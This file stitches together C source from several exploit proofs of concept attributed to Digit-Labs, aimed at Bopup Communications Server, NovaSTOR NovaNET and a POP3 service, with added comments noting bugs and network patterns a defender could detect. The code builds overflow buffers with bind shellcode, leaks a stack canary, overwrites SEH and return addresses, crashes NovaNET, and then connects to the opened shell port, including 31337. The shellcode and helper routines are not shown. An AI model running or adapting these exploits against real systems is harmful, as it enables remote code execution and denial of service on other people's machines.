/*
 * Entry point of the Bopup Communications Server PoC.
 *
 * Flow as written: connect to <host>:PORT_BOPUP, send a buffer prepared by
 * zbuffami() (defined elsewhere), close the socket, wait two seconds, then
 * attempt a second connection to <host>:PORT_SHELL and hand that socket to
 * shellami() (also defined elsewhere).
 *
 * Defender note: the observable pattern is one request of exactly
 * BOPUP_STR_OFFSET + BOPUP_STR_LEN bytes to PORT_BOPUP, followed roughly two
 * seconds later by a connection attempt to PORT_SHELL from the same source.
 * "Success" is inferred only from that second connect being accepted.
 */
int main (int argc, char **argv)
{
  char zbuf[BUF_SIZE];   /* zbuffami() must stay within BUF_SIZE -- not checked here */
  int fd, n;

  printf ("Bopup Communications Server remote SYSTEM exploit\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2008!@$!\n\n");

  if (argc <= 1)
    {
      fprintf (stderr, "Usage: %s <host>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  /* sockami() is not shown; from the check below it returns -1 on failure */
  fd = sockami (argv[1], PORT_BOPUP);
  if (fd == -1)
    {
      fprintf (stderr, "%s: sockami failed\n", argv[0]);
      exit (EXIT_FAILURE);
    }
  printf ("* connected to %s:%d\n\n", argv[1], PORT_BOPUP);
  printf ("** SEH offset @+%04X\n", BOPUP_STR_OFFSET + BOPUP_STR_LEN - 8);
  printf ("** return addy @0x%08X\n\n", BOPUP_POPRET);

  printf ("* building buffer with shellcode...");
  zbuffami (zbuf);
  printf ("done\n");

  printf ("* sending request...");
  /* a short write is treated as a hard failure, not retried */
  if ((n = sock_send (fd, zbuf, BOPUP_STR_OFFSET + BOPUP_STR_LEN)) != BOPUP_STR_OFFSET + BOPUP_STR_LEN)
    {
      fprintf (stderr, "%s: sock_send returned %d (!= %d)\n", argv[0], n, BOPUP_STR_OFFSET + BOPUP_STR_LEN);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");
  close (fd);

  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);
  /* no protocol-level confirmation: only a successful connect is checked */
  if ((fd = sockami (argv[1], PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (fd);
    }
  return (EXIT_SUCCESS);
}
/*
 * formatme -- sends the file-scope formatString to <host>:PORT_POP3, waits
 * two seconds, then connects to port 31337 and passes that socket to shell().
 *
 * Notes: neither sockami() nor sock_send() return values are checked, so a
 * refused connection yields -1 which is then passed straight to sock_send()
 * and shell(). The first socket is never closed. From a monitoring point of
 * view the fixed follow-up port (31337) is the distinctive artefact.
 */
static void formatme (u_char * host)
{
  /* do the evil */
  int sock;

  printf ("+Connecting to %s:%d ", host, PORT_POP3);
  sock = sockami (host, PORT_POP3);   /* -1 on failure is not handled here */
  printf ("\n+Sending format string\n");
  sock_send (sock, formatString, strlen (formatString));
  fflush (stdout);
  sleep(2);

  printf ("+Connecting to Shell ");
  sock = sockami (host, 31337);   /* previous descriptor is overwritten without close() */
  printf ("- Done\n");
  shell(sock);
}
/*
 * novanet_read -- sends one request packet and copies a pointer-sized value
 * out of the reply.
 *
 * @host:  target host, passed to sockami().
 * @start: value rewritten through NOVANET_CALC_INT (macro not shown) and then
 *         stored into the packet via NOVANET_SET_INT after a cast to
 *         unsigned int (truncating on 64-bit targets).
 * @dst:   receives sizeof (void *) bytes copied from rbuf[NOVANET_INT_IDX].
 *
 * Returns 1 on success, 0 on a short send or receive. A select() error or a
 * 4-second silence from the peer terminates the process instead of returning.
 * Note: both 'return (0)' paths leave fd open.
 */
static int novanet_read (char *host, void *start, void *dst)
{
  fd_set r_fds;
  struct timeval tv;
  int fd, n;
  char buf[NOVANET_PKT_SZ], rbuf[NOVANET_PKT_SZ];

  novanet_read_pkt_init (buf);   /* not shown; fills the request template */
  start = (void *) NOVANET_CALC_INT (start);

  fd = sockami (host, NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "novanet_read: sockami failed\n");
      exit (EXIT_FAILURE);
    }

  NOVANET_SET_INT (buf, (unsigned int) start);
  if ((n = sock_send (fd, buf, sizeof buf)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_read: sock_send returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      return (0);   /* fd leaks on this path */
    }

  FD_ZERO (&r_fds);
  FD_SET (fd, &r_fds);
  tv.tv_sec = 4;   /* wait 4 seconds */
  tv.tv_usec = 0;
  n = select (fd + 1, &r_fds, NULL, NULL, &tv);
  if (n == -1)
    {
      fprintf (stderr, "novanet_read: select() - %s\n", strerror (errno));
      exit (EXIT_FAILURE);
    }
  else if (n)
    {
      if ((n = sock_recv (fd, rbuf, sizeof rbuf)) != NOVANET_PKT_SZ)
        {
          fprintf (stderr, "novanet_read: sock_recv returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
          return (0);   /* fd leaks on this path too */
        }
    }
  else
    {
      /* timeout: the author interprets silence as the service having died */
      fprintf (stderr, "novanet_read: select timeout, we may have crashed NovaNET :(\n");
      exit (EXIT_FAILURE);
    }

  /* only a pointer-sized slice of the reply is returned to the caller */
  memcpy (dst, &rbuf[NOVANET_INT_IDX], sizeof (void *));
  usleep (USLEEP_TIME);
  close (fd);
  return (1);
}
/*
 * novanet_read (variant) -- either sends a single packet in DoS mode, or
 * opens one connection per iteration and writes sizeof (int) bytes of each
 * reply to stderr.
 *
 * @start, @end: rewritten through NOVANET_CALC_INT (macro not shown). The
 *               non-DoS iteration count is the difference end - start, which
 *               is arithmetic on void * (a GNU extension).
 * @is_dos:      non-zero sends one packet carrying
 *               NOVANET_CALC_INT (0xdeadbeef) and reads no reply.
 *
 * Notes: sock_send()/sock_recv() return values are ignored, so a short or
 * failed read still dumps whatever rbuf holds. In DoS mode the socket is
 * never closed. On the wire this is num_hits separate connections to
 * NOVANET_TCP_PORT from one source, each carrying a NOVANET_PKT_SZ-byte
 * request -- a simple pattern for a network sensor to flag.
 */
static void novanet_read (char *host, void *start, void *end, int is_dos)
{
  int sock, i, num_hits;
  char buf[BUF_SIZE], rbuf[BUF_SIZE];

  novanet_pkt_init (buf);   /* not shown; fills the request template */
  start = (void *) NOVANET_CALC_INT (start);
  end = (void *) NOVANET_CALC_INT (end);

  if (!is_dos)
    printf ("start: %p end: %p\n", start, end);

  num_hits = is_dos ? 1 : (end - start);
  printf ("+hitting %s:%d. (%d times)\n", host, NOVANET_TCP_PORT, num_hits);

  for (i = 0; i < num_hits; i++, start++)
    {
      sock = sockami (host, NOVANET_TCP_PORT);
      if (sock == -1)
        break;   /* first failed connect ends the loop silently */

      NOVANET_SET_INT (buf, (is_dos ? NOVANET_CALC_INT (0xdeadbeef) : (unsigned int) start));
      sock_send (sock, buf, sizeof buf);   /* return value unchecked */

      if (!is_dos)
        {
          sock_recv (sock, rbuf, sizeof rbuf);   /* return value unchecked */
          /* raw reply bytes go to stderr so stdout keeps the progress output */
          write (fileno (stderr), &rbuf[NOVANET_INT_IDX], sizeof (int));
          usleep (USLEEP_TIME);
          close (sock);
          if (!((i + 1) % 8))
            printf ("..%d", i + 1);
          fflush (stdout);
        }
    }
  printf ("\n");
}
/*
 * novanet_own_process -- runs the login / remaining-length / hammer packet
 * sequence against the service and then probes PORT_SHELL.
 *
 * @thost:   target host.
 * @d_name:  NOVANET_DOMAIN_SZ bytes copied into the file-scope login_buf at
 *           offset 0x54 (login_buf itself is not in view).
 * @esp_val: combined with the value fetched by novanet_read() through
 *           CANARY_VAL() (macro not shown) and rejected if HAS_NULL() holds.
 *
 * Notes: the socket is opened before the HAS_NULL() validation and leaks on
 * that exit path. malloc() is unchecked before memset() writes rlen bytes.
 * The stores through `*(unsigned int *) &rem_buf[12]` and `&ptr[0x104]` /
 * `&ptr[0x108]` are unaligned type-punned accesses (UB on strict targets).
 * Every error path exit()s; the caller never regains control on failure.
 * Success is inferred solely from a later connect to PORT_SHELL.
 */
static void novanet_own_process (char *thost, char *d_name, int esp_val)
{
  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
  int canary_val, fd, n, rlen;

  if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0)
    {
      fprintf (stderr, "novanet_own_process: reading canary failed\n");
      exit (EXIT_FAILURE);
    }

  fd = sockami (thost, NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "novanet_own_process: sockami failed\n");
      exit (EXIT_FAILURE);
    }

  printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val);
  if (HAS_NULL (CANARY_VAL(canary_val, esp_val)))
    {
      fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
      exit (EXIT_FAILURE);   /* fd leaks here */
    }

  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);

  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
  printf ("** sending login packet...");
  if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** reading fourth packet...");
  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
  /* length field lives at bytes 12..15 of the header; unaligned store */
  *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
  printf ("** sending remaining %d-bytes packet...", rlen);
  if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** sending hammer packet...");
  ptr = malloc (rlen * sizeof (char));   /* NULL is not checked before memset() */
  memset (ptr, 0x41, rlen);
  *(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val);
  *(unsigned int *) &ptr[0x108] = NTDLL_ESP;
  memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
  ptr[rlen - 1] = '\0';
  if ((n = sock_send (fd, ptr, rlen)) != rlen)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, rlen);
      exit (EXIT_FAILURE);   /* ptr is not freed on this path */
    }
  free (ptr);
  printf ("done\n\n");

  usleep (USLEEP_TIME);
  close (fd);

  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);
  /* no protocol-level confirmation: only a successful connect is checked */
  if ((fd = sockami (thost, PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (fd);
    }
}
/*
 * novanet_get_domain -- performs the getdomain exchange and copies the
 * NOVANET_DOMAIN_SZ-byte domain field from the first reply into d_name.
 *
 * @thost:  target host.
 * @d_name: caller-provided buffer of at least NOVANET_DOMAIN_SZ bytes. It is
 *          not NUL-terminated here, which is why it is printed with %.*s.
 *
 * Notes: rlen is taken verbatim from the peer (bytes 12..15 of rbuf_hdr via an
 * unaligned unsigned int cast, then narrowed to int) and is only checked
 * against a lower bound, so a hostile or malformed server controls the size
 * passed to malloc() and sock_recv(); the malloc() result is unchecked. The
 * tool therefore trusts network input it should treat as untrusted. The error
 * text on the final send says "novanet_own_process" -- a copy-paste slip that
 * misattributes the failure. Every error path exit()s.
 */
static void novanet_get_domain (char *thost, char *d_name)
{
  char rbuf_hdr[NOVANET_HDR_SZ], rbuf_pkt[NOVANET_PKT_SZ], *pkt_ptr;
  int fd, n, rlen;

  fd = sockami (thost, NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "novanet_get_domain: sockami failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);

  printf ("** sending getdomain_buf packet...");
  if ((n = sock_send (fd, getdomain_buf, sizeof getdomain_buf - 1)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** reading first reply...");
  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* domain field sits at offset 0x54 of the reply; copied without a terminator */
  memcpy (d_name, &rbuf_pkt[0x54], NOVANET_DOMAIN_SZ);
  printf ("** remote domain address: %.*s\n", NOVANET_DOMAIN_SZ, d_name);

  printf ("** sending ack packet...");
  if ((n = sock_send (fd, ack_buf, sizeof ack_buf - 1)) != NOVANET_HDR_SZ + 4)
    {
      fprintf (stderr, "novanet_get_domain: sock_send returned %d (!= %d)\n", n, NOVANET_HDR_SZ + 4);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** reading second reply...");
  if ((n = sock_recv (fd, rbuf_hdr, sizeof rbuf_hdr)) != NOVANET_HDR_SZ)
    {
      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* remote-supplied length; only the lower bound is validated */
  rlen = *(unsigned int *) &rbuf_hdr[12];
  if (rlen < NOVANET_HDR_SZ)
    {
      fprintf (stderr, "novanet_get_domain: remaining length invalid (<%d)\n", NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  rlen -= NOVANET_HDR_SZ;

  printf ("** reading %d-remaining bytes...", rlen);
  pkt_ptr = malloc (rlen * sizeof (char));   /* size chosen by the peer; NULL unchecked */
  if ((n = sock_recv (fd, pkt_ptr, rlen)) != rlen)
    {
      fprintf (stderr, "novanet_get_domain: sock_recv returned %d (!= %d)\n", n, rlen);
      exit (EXIT_FAILURE);   /* pkt_ptr is not freed on this path */
    }
  printf ("done\n");
  free (pkt_ptr);

  printf ("** sending hup packet...");
  if ((n = sock_send (fd, hup_buf, sizeof hup_buf - 1)) != NOVANET_HDR_SZ)
    {
      /* message names the wrong function (copy-paste from novanet_own_process) */
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n\n");

  usleep (USLEEP_TIME);
  close (fd);
}
/*
 * Entry point of the NovaNET DoS PoC.
 *
 * Flow as written: send the file-scope hdr_pkt, read one NOVANET_PKT_SZ reply,
 * then send rem_pkt with its length field (bytes 12..15) set to a random
 * value strictly above NOVANET_MAX_LEN, and close.
 *
 * Notes on rlen: rand() is int and is converted to unsigned for the modulo
 * with (UINT_MAX - NOVANET_MAX_LEN). Because rand() <= RAND_MAX, the result
 * in practice falls in [NOVANET_MAX_LEN + 1, NOVANET_MAX_LEN + 1 + RAND_MAX]
 * (assuming UINT_MAX - NOVANET_MAX_LEN > RAND_MAX -- not verifiable here).
 * The store into rem_pkt is an unaligned type-punned write. Nothing confirms
 * the effect on the peer; the program exits right after the send.
 */
int main (int argc, char **argv)
{
  char rbuf_pkt[NOVANET_PKT_SZ];
  unsigned int rlen;
  int fd, n;

  printf ("NovaSTOR NovaNET remote DoS\n"
          "by: <*****@*****.**>\n"
          "http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");

  if (argc < 2)
    {
      fprintf (stderr, "Usage: %s <host>\n", argv[0]);
      exit (EXIT_SUCCESS);
    }

  fd = sockami (argv[1], NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "main: sockami failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* connected to %s:%d\n", argv[1], NOVANET_TCP_PORT);

  printf ("** sending header packet...");
  if ((n = sock_send (fd, hdr_pkt, sizeof hdr_pkt - 1)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "main: sock_send returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** reading first reply...");
  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "main: sock_recv returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  /* time-seeded PRNG; only used to vary the oversized length per run */
  srand (time (NULL));
  rlen = NOVANET_MAX_LEN + (rand () % (UINT_MAX - NOVANET_MAX_LEN)) + 1;
  *(unsigned int *) &rem_pkt[12] = rlen;   /* header length field; unaligned store */
  printf ("** sending smash packet [remaining length %u-bytes]...", rlen);
  if ((n = sock_send (fd, rem_pkt, sizeof rem_pkt - 1)) != NOVANET_HDR_SZ)
    {
      fprintf (stderr, "main: sock_send returned %d (!= %d)\n", n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  usleep (USLEEP_TIME);
  close (fd);
  return (EXIT_SUCCESS);
}
/*
 * novanet_own_process (Linux variant) -- runs the login / remaining-length /
 * hammer packet sequence against the service and then probes PORT_SHELL.
 *
 * @thost:  target host.
 * @d_name: NOVANET_DOMAIN_SZ bytes copied into the file-scope login_buf at
 *          offset 0x54 (login_buf itself is not in view).
 *
 * Notes: malloc() is unchecked before memset() writes rlen bytes, and ptr is
 * not freed on the send-failure path. The stores through
 * `*(unsigned int *) &rem_buf[12]` and `&ptr[0x134]` are unaligned type-punned
 * accesses (UB on strict targets). Every error path exit()s. Success is
 * inferred solely from a later connect to PORT_SHELL being accepted; on the
 * wire that is one NOVANET_TCP_PORT session followed ~2 s later by a connect
 * to PORT_SHELL from the same source.
 */
static void novanet_own_process (char *thost, char *d_name)
{
  char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
  int fd, n, rlen;

  fd = sockami (thost, NOVANET_TCP_PORT);
  if (fd == -1)
    {
      fprintf (stderr, "novanet_own_process: sockami failed\n");
      exit (EXIT_FAILURE);
    }
  printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);

  memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
  printf ("** sending login packet...");
  if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** reading fourth packet...");
  if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n", n, NOVANET_PKT_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  rlen = 0x138 + 1;
  /* length field lives at bytes 12..15 of the header; unaligned store */
  *(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
  printf ("** sending remaining %d-bytes packet...", rlen);
  if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, NOVANET_HDR_SZ);
      exit (EXIT_FAILURE);
    }
  printf ("done\n");

  printf ("** sending hammer packet...");
  ptr = malloc (rlen * sizeof (char));   /* NULL is not checked before memset() */
  memset (ptr, 0x41, rlen);
  *(unsigned int *) &ptr[0x134] = NOVANET_POPRET;
  memcpy (&ptr[0], lnx_x86_bind, sizeof lnx_x86_bind - 1);
  ptr[rlen - 1] = '\0';
  if ((n = sock_send (fd, ptr, rlen)) != rlen)
    {
      fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n", n, rlen);
      exit (EXIT_FAILURE);   /* ptr is not freed on this path */
    }
  free (ptr);
  printf ("done\n\n");

  usleep (USLEEP_TIME);
  close (fd);

  printf ("* waiting for the shellcode to be executed...\n");
  sleep (2);
  /* no protocol-level confirmation: only a successful connect is checked */
  if ((fd = sockami (thost, PORT_SHELL)) != -1)
    {
      printf ("+Wh00t!\n\n");
      shellami (fd);
    }
}